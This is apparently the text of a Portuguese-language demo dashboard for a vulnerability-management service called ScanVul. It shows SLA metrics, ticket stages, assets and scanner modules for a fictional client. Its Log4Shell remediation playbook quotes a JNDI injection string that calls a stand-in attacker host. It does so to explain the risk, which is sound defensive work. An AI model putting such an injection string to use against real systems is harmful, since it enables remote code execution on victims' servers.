Operação · Dashboard
Visão geral da operação
Cliente Demo · 87 endpoints monitorados · janela 30 dias
Fluxo controlado · principal diferencial ScanVul
Operação contínua · cada vulnerabilidade segue um caminho
Identificada, classificada por risco, priorizada, corrigida (remotamente sempre que possível), validada e monitorada. Tudo controlado por sistema, com SLA e responsável em cada estágio.
Tempo real
Janela 30d
01
Identificada
142
02
Classificada
137
03
Priorizada
115
04
Em correção
27
05
Validada
9
06
Monitorada
102
SLA atendimento
96.2%meta 95%
SLA resolução
88.4%meta 90%
Tempo médio resolução
14h↓ 32% vs mês ant.
Próximo PDCA
12 nov 2025 · 14h
Vulnerabilidades críticas
12
vs ontem · ▼ 3
Vulnerabilidades altas
30
esta semana · ▲ 5
Resolvidas (mês)
186
SLA cumprido · 94.6%
Aging médio
14h
tendência 30d · ▼ 32%
Módulos ScanVul
4 módulos ativos no plano Estendida · clique para acessar
CoreVisibilidade
87ativos cobertos
SensorPostura granular
84endpoints
ProbeScan de infra
7scans 24h
WebScanAplicações web
4alvos web
Distribuição por severidade
142 vulnerabilidades em aberto
142
Total
Crítica128.5%
Alta3021.1%
Média4229.6%
Baixa3021.1%
Informativa2819.7%
SLA — últimos 30 dias
Plano Estendida · 8h atend / 16h res
Atendimento96.2%
Meta 95% · 8h em 8×5
Resolução88.4%
Meta 90% · 16h em 8×5
Re-scan após correção100%
Automático na fase de validação
Top 5 vulnerabilidades por SVS
ScanVul Score · priorização contextual baseada em CVSS, KEV e exposição
Vulnerabilidade
Ativo
Módulo
Severidade
Estágio
SLA
96
RCE remoto via desserialização
CVE-2021-44228 · CVSS 9.6 · KEV listada
SRV-WEB-01
Probe
Crítica
Identificada
2h restantes
88
SMBv1 habilitado em servidor
smb.v1_enabled · CVSS 8.8 · wormable
SRV-FILE-02
Sensor
Crítica
Em correção
8h restantes
84
Patch crítico de SO pendente
KB5034441 · CVSS 8.4 · 47 dias
DESK-IT-03
Core
Crítica
Identificada
12h restantes
81
FileVault desabilitado em laptop
filevault.enabled · CVSS 8.1
MAC-AUDIO-04
Sensor
Crítica
Priorizada
11h restantes
79
RDP exposto sem NLA
UserAuthentication = 0 · CVSS 7.9
DESK-FIN-14
Sensor
Alta
Priorizada
14h restantes
Operação · Vulnerabilidades
Vulnerabilidades
142 abertas · 27 em correção · 9 em validação · 102 monitoradas (30d) · 1.247 fechadas (90d)
Vulnerabilidade
Ativo
Módulo
Severidade
Estágio
Aberta há
SLA
96
RCE remoto via desserialização
CVE-2021-44228 · CVSS 9.6 · KEV
SRV-WEB-01
Probe
Crítica
Identificada
3h 12min
2h restantes
88
SMBv1 habilitado em servidor
smb.v1_enabled · CVSS 8.8 · wormable
SRV-FILE-02
Sensor
Crítica
Em correção
1d 4h
8h restantes
84
Patch crítico de SO pendente
KB5034441 · CVSS 8.4 · 47 dias
DESK-IT-03
Core
Crítica
Identificada
8h 21min
12h restantes
81
FileVault desabilitado em laptop
filevault.enabled · CVSS 8.1
MAC-AUDIO-04
Sensor
Crítica
Priorizada
2d
11h restantes
79
RDP exposto sem NLA
rdp.nla_required · CVSS 7.9
DESK-FIN-14
Sensor
Alta
Priorizada
2h 45min
14h restantes
74
MFA não obrigatório em Microsoft 365
m365.mfa_required · CVSS 7.4 · 7 contas
M365 tenant
Core
Alta
Em validação
2d 8h
—
71
LLMNR habilitado em rede corporativa
network.llmnr_enabled · CVSS 7.1
14 ativos
Sensor
Alta
Identificada
4d
GPO sugerida
68
SQL injection em formulário de busca
CWE-89 · OWASP A03 · CVSS 6.8
portal.demo.com.br
WebScan
Alta
Identificada
6h 03min
22h restantes
64
Subdomínio exposto sem WAF
asm.exposed_no_waf · CVSS 6.4
staging.demo.com.br
Core
Alta
Identificada
11h
5h restantes
58
BitLocker desativado em laptop
bitlocker.system_drive_status · CVSS 5.8
LAP-VEND-09
Sensor
Média
Identificada
1d 2h
2d restantes
Mostrando 1–10 de 142 vulnerabilidades
Vulnerabilidades · CVE-2021-44228
RCE remoto via desserialização
Aplicação Java · SVS 96 · CVSS 9.6 · KEV listada · ativo SRV-WEB-01
Estágio atual no fluxo
Status desta vulnerabilidade na operação contínua
01 · ATUAL
Identificada
02
Classificada
03
Priorizada
04
Em correção
05
Validada
06
Monitorada
PB-RCE-001 · Playbook de remediação
Mitigar exposição a RCE via desserialização
Análise de risco
A vulnerabilidade permite execução remota de código via mensagens de log que invocam JNDI lookups. Um atacante pode injetar uma string como
${jndi:ldap://atk/x} em qualquer entrada loggada. Esta CVE consta na lista CISA KEV (exploit ativo em campanhas de ransomware) e tem alta probabilidade de exploração no curto prazo.Passos de remediação
1
Identificar versão exata da biblioteca em uso
Versões 2.0-beta9 a 2.16.0 são vulneráveis. Procure JARs na aplicação.
find / -name "log4j-core-*.jar" 2>/dev/null
unzip -p log4j-core-X.Y.jar META-INF/MANIFEST.MF | grep Version
2
Atualizar para versão patched (2.17.1+)
Substitua o JAR vulnerável e reinicie a aplicação.
3
Validar mitigação com re-scan
Após reinício, o sistema fará re-scan automático em até 30min para validar a correção.
4
Mitigação alternativa (se patch impossível)
Definir variável de ambiente para desabilitar lookups remotos.
LOG4J_FORMAT_MSG_NO_LOOKUPS=true
SCANVUL-2847
RCE em SRV-WEB-01 · CVE-2021-44228
Abrir ticket completo →
SVS · ScanVul Score
96
Score contextual
CVSS · KEV · exposição
CVSS base9.6 / 10
VetorNetwork
CISA KEVSim
Exploit públicoSim
Multiplicador ativo×1.3
Ativo afetado
HostnameSRV-WEB-01
IP interno10.0.12.4
SOUbuntu 22.04
CriticidadeCrítica
ExposiçãoInternet
Operação · Tickets
Quadro de tickets · operação contínua
27 tickets em fluxo ativo · 102 em monitoramento · SLA de resolução: 16h em 8×5
Identificada
8
SCANVUL-284796
RCE remoto · CVE-2021-44228
SRV-WEB-01Probe
SCANVUL-284984
Patch crítico de SO · KB5034441
DESK-IT-03Core
SCANVUL-285168
SQL injection · /search?q=
portal.demoWebScan
SCANVUL-285364
Subdomínio exposto sem WAF
stagingCore
Classificada
5
SCANVUL-284271
LLMNR habilitado · 14 ativos
14 hostsSensor
SCANVUL-284458
Chrome desatualizado · CVE-2024-7965
17 hostsCore
SCANVUL-284558
BitLocker desativado em laptop
LAP-VEND-09Sensor
Priorizada
5
SCANVUL-283881
FileVault desabilitado em laptop
MAC-AUDIO-04Sensor
SCANVUL-284079
RDP exposto sem NLA
DESK-FIN-14Sensor
SCANVUL-284154
Defender desatualizado · 4 endpoints
4 hostsSensor
Em correção
6
SCANVUL-282588
SMBv1 habilitado em servidor
SRV-FILE-02Sensor
SCANVUL-282972
Senha de admin local fraca
3 hostsSensor
SCANVUL-283259
SSH com senha permitida
LIN-DEV-02Sensor
Em validação
3
SCANVUL-281074
MFA não obrigatório · M365
M365 tenantCore
SCANVUL-281255
UAC com prompt baixo
DESK-FIN-08Sensor
Monitorada
102
SCANVUL-2799resolvido
Patch Microsoft Office aplicado
42 hostsCore
SCANVUL-2802resolvido
Firewall Windows habilitado · perfil público
12 hostsSensor
SCANVUL-2805resolvido
Autoplay desabilitado via GPO
87 hostsSensor
Operação · Ativos
Ativos monitorados
87 ativos · 84 com Sensor instalado · 4 web públicos · 1 Probe interno
Hostname
IP
SO
Tipo
Criticidade
Exposição
Vulns abertas
Sensor
Última coleta
SRV-WEB-01
10.0.12.4
Ubuntu 22.04
Servidor
Crítico
internet
14
v1.4.2
há 3h
SRV-FILE-02
10.0.10.12
Win Server 2019
Servidor
Alta
internal
9
v1.4.2
há 12min
SRV-DC-01
10.0.10.5
Win Server 2022
Domain Controller
Crítico
internal
6
v1.4.2
há 8min
DESK-IT-03
10.0.20.18
Windows 11 Pro
Workstation
Alta
internal
11
v1.4.2
há 4min
MAC-AUDIO-04
10.0.20.55
macOS Sonoma
Workstation
Alta
internal
8
v1.4.2
há 6min
DESK-FIN-14
10.0.20.42
Windows 11 Pro
Workstation
Média
internal
7
v1.4.2
há 17min
LIN-DEV-02
10.0.20.83
Ubuntu 24.04
Workstation
Média
internal
4
v1.4.2
há 22min
LAP-VEND-09
10.0.20.91
Windows 10 Pro
Laptop
Média
remoto
3
offline 2h
há 2h
portal.demo.com.br
192.0.2.45
—
Web público
Alta
internet
5
— (WebScan)
há 6h
app.demo.com.br
198.51.100.78
—
Web público
Alta
internet
2
— (WebScan)
há 6h
Módulos · Core
CScanVul Core
Visibilidade contínua · inventário, vulnerabilidades autenticadas, postura de endpoint cloud e superfície externa
▤ Ativos catalogados
87
2 novos esta semana
⚠ Vulns autenticadas
63
com KEV: ▲ 4
⟳ Patches pendentes
28
críticos: 12
◉ MFA M365
94%
7 contas pendentes
Categorias de visibilidade
Findings produzidos pelo Core, agrupados por tipo de evidência
Inventário e descoberta de ativos
Mapeamento contínuo de endpoints, servidores e dispositivos. Detecta ativos novos, sumidos e shadow IT.
87
ativos
Vulnerabilidades de SO e Software
Scan autenticado de pacotes instalados, versões e CVEs aplicáveis. Cobertura de aplicações de prateleira.
63
vulns abertas
Gestão de patches e atualizações
Reconciliação contínua de patches faltantes por endpoint. KBs Microsoft, atualizações macOS, pacotes Linux.
28
patches críticos
Postura cloud · M365 e Defender
Conformidade de MFA, configurações de Defender, políticas de senha, auditoria de licenças e contas privilegiadas.
7
desvios M365
Superfície externa (ASM)
Descoberta de IPs públicos, subdomínios e ativos expostos sem proteção (WAF, certificado, header).
3
ativos expostos
Módulos · Sensor
SScanVul Sensor
Postura granular de endpoint · adaptativo Win/Mac/Linux · 84 endpoints conectados
Todos 84
Windows 71
macOS 9
Linux 4
Offline 3
Implante o Sensor nos seus endpoints
Agente leve em Go · 18MB · sem driver de kernel · sem hook em processo · footprint <1% CPU em idle. Coleta posture adaptada por sistema operacional. Distribuição via GPO (Win), MDM (Mac) ou pacote (Linux).
⬇
Windows · MSIscanvul-sensor-x64.msi
⬇
macOS · PKGscanvul-sensor.pkg
⬇
Linux · DEB/RPMscanvul-sensor
Token de enrollment (Cliente Demo)
Token único do tenant. Embutido nos pacotes. Válido por 30 dias.
eyJ0ZW5hbnQiOiJjbGllbnRlLWRlbW8iLCJleHAi...K8Hq
Cobertura de checks por SO
O Sensor adapta os checks ao sistema operacional · ~80 checks no total, ~52 aplicáveis por host
Windows60 checks
Defender · Tamper Protection · BitLocker · UAC · Firewall · SMB · LLMNR · RDP/NLA · Local admins · Persistência (Run keys, services, tasks) · VSS · Patch level via WMI
macOS52 checks
XProtect · Gatekeeper · FileVault · SIP · pf/socketfilterfw · Screen Lock · ARD/SSH · LaunchAgents/Daemons · Time Machine · sudo timestamp · softwareupdate
Linux48 checks
ufw/firewalld/nft · LUKS · SSH config · sudoers · systemd · cron · auditd · apt/dnf/rpm patches · ClamAV opcional · políticas de senha · /etc permissions
Endpoints com Sensor
81 online · 3 offline há > 24h · 4 com versão antiga (v1.4.0) pendente atualização
SRV-FILE-02
Windows Server 2019 · 10.0.10.12
DESK-IT-03
Windows 11 Pro · 10.0.20.18
MAC-AUDIO-04
macOS Sonoma · 10.0.20.55
LIN-DEV-02
Ubuntu 24.04 · 10.0.20.83
LAP-VEND-09
Windows 10 Pro · remoto
DESK-MARK-07
Windows 11 Pro · remoto
LAP-SALES-12
Windows 11 Pro · remoto
Módulos · Probe
PScanVul Probe
Scanner de infraestrutura on-premise · CVEs de rede e serviços · scan autenticado e não autenticado
Probe Cliente Demo · sede
Appliance virtual · 4 vCPU · 8GB RAM · 200GB SSD
Scans 24h
7
CPU média
22%
Hosts descobertos
203
na última varredura
Vulns Probe
38
críticas: 5
Scans agendados
12
próximas 7 dias
Tempo médio scan
23min
↓ 18% vs anterior
Scans recentes
Últimas execuções do Probe nos segmentos da rede
Scan
Segmento
Hosts
Vulns encontradas
Duração
Iniciado
Scan completo · semanal
Autenticado · todos serviços
10.0.10.0/24
42
14
28 min
há 2h
Scan diário · workstations
Não autenticado · TCP top-1000
10.0.20.0/24
68
9
22 min
há 6h
Scan DC e fileservers
Autenticado · profundo
10.0.10.0/28
8
6
42 min
há 12h
Discovery de novos ativos
ICMP · ARP · service detection
10.0.0.0/16
203
2 novos
8 min
há 1d
Módulos · WebScan
WScanVul WebScan
Análise contínua de aplicações web · OWASP Top 10 · CVEs de framework · headers e cookies
Alvos web ativos
4
3 públicos · 1 interno
Críticas + Altas
10
OWASP A03: 3
Headers ausentes
8
CSP · HSTS · XFO
Último scan
6h
próximo em 6h
Alvos web monitorados
Cobertura OWASP Top 10 · CVEs de framework · análise de headers e cookies
portal.demo.com.br
Aplicação Java · Spring Boot · WAF Cloudflare · último scan há 6h
3
crítica
2
alta
5
média
12
info
app.demo.com.br
SPA React · API Node.js · sem WAF · último scan há 6h
0
crítica
2
alta
3
média
8
info
staging.demo.com.br
Aplicação Spring · sem WAF · último scan há 6h
2
alta
4
média
9
info
—
crítica
painel-interno.demo.local
Aplicação interna · Django · acesso VPN · último scan há 1d
0
crítica
1
alta
2
média
5
info
Análise · PDCA & SLA
Acompanhamento operacional
Reuniões PDCA, evolução de SLA e plano de ação · plano Estendida
SLA — evolução 6 meses
Atendimento e resolução vs metas contratuais
Atendimento (96.2%)
Resolução (88.4%)
Próximas reuniões PDCA
Mensal incluso · semanal opcional
PDCA mensal · novembro
Apresentação de resultados, plano de ação, alinhamento operacional
12 nov 2025 · 14h
Revisão de tickets críticos
SCANVUL-2825 · pendência de janela de manutenção
15 nov 2025 · 10h
PDCA mensal · dezembro
Fechamento de ano · evolução de maturidade · roadmap 2026
10 dez 2025 · 14h
Plano de ação · derivado da última reunião PDCA
Itens acompanhados em sistema · 5 abertos · 1 concluído
#
Item
Responsável
Prazo
Status
001
Aplicar GPO para desabilitar LLMNR
Mitiga 14 vulnerabilidades de uma vez
TI cliente
15 nov 2025
Em correção
002
Forçar MFA em contas administrativas M365
7 contas pendentes
TI cliente
20 nov 2025
Priorizada
003
Janela de manutenção SRV-FILE-02
Necessário para desabilitar SMBv1
Operação Innova
17 nov 2025 · 22h
Priorizada
004
Treinamento sobre playbooks
Time de TI · 1h remoto
Innova
30 nov 2025
Identificada
005
Patches de SO automatizados via WSUS
Reduz aging médio de 28 patches
TI cliente
10 dez 2025
Identificada
006
BitLocker em laptops de vendas
12 laptops · perda física
TI cliente
15 out 2025
Concluída
Análise · Relatórios
Relatórios
Executivo, operacional e técnico · gerados sob demanda ou agendados
Relatório Executivo Mensal
Visão estratégica para diretoria · indicadores de SLA, tendências, evolução de maturidade.
Mensal · próximo em 8dPDF · 12 págs
Relatório Operacional
Detalhamento técnico para o time de TI · todas vulnerabilidades, ações tomadas, plano.
Quinzenal · próximo em 4dPDF · 28 págs
Vulnerabilidades Críticas
Lista detalhada das vulnerabilidades classificadas como críticas e altas, com playbooks.
Sob demandaPDF · variável
Inventário de Ativos
Snapshot completo do parque · sistemas operacionais, criticidade, vulns por host.
Sob demandaXLSX · CSV
Plano de Ação · PDCA
Itens da última reunião PDCA · responsáveis, prazos, status atual de cada ação.
Mensal · após PDCAPDF · 6 págs
Compliance & Postura
Status de conformidade · MFA, criptografia, AV, patches, configurações de segurança.
Trimestral · próximo Q4PDF · 18 págs
Histórico de relatórios gerados
Últimos 6 meses
Relatório
Período
Gerado em
Tamanho
Ações
Configurações
Configurações da operação
Plano, módulos, SLA, notificações e usuários
Configurações gerais
Nome do tenant
Aparece em relatórios, tickets e portal
Plano contratado
Define limites, SLA e módulos disponíveis
Endpoints monitorados
87 / 100 utilizados · linha de corte 1
87 / 100
Início do contrato
Sem fidelidade · cancelável a qualquer momento
Módulos do plano
O plano Estendida inclui todos os 4 módulos. A Avançada adiciona Shodan, geolocalização e suporte 24×7.
C
ScanVul Core
Visibilidade contínua · inventário, vulns autenticadas, patches, postura cloud, ASM externa
S
ScanVul Sensor
Postura granular de endpoint · adaptativo Win/Mac/Linux · ~80 checks
P
ScanVul Probe
Scanner de infraestrutura on-premise · CVEs em rede e serviços
W
ScanVul WebScan
Análise de aplicações web · OWASP Top 10, CVEs de framework, exposições
SVS · ScanVul Score
Habilitar SVS
Priorização contextual baseada em CVSS, EPSS, KEV e exposição
Considerar CISA KEV
Adicionar peso a vulnerabilidades exploradas ativamente
Multiplicador de criticidade
Aplicar fator por criticidade do ativo (alta = ×1.3)
Threshold de ação imediata
Score acima do qual o sistema escala automaticamente
SLA contratual · plano Estendida
Atendimento — vulnerabilidades
Tempo máximo até primeira resposta
Resolução — vulnerabilidades
Tempo máximo até resolução (exceto sem patch disponível)
Atendimento — suporte / dúvidas
Tickets de suporte ou esclarecimentos
Resolução — suporte / dúvidas
Tempo máximo até encerramento de tickets de suporte
Suporte mensal incluso
Horas de suporte 8×5 · plano Estendida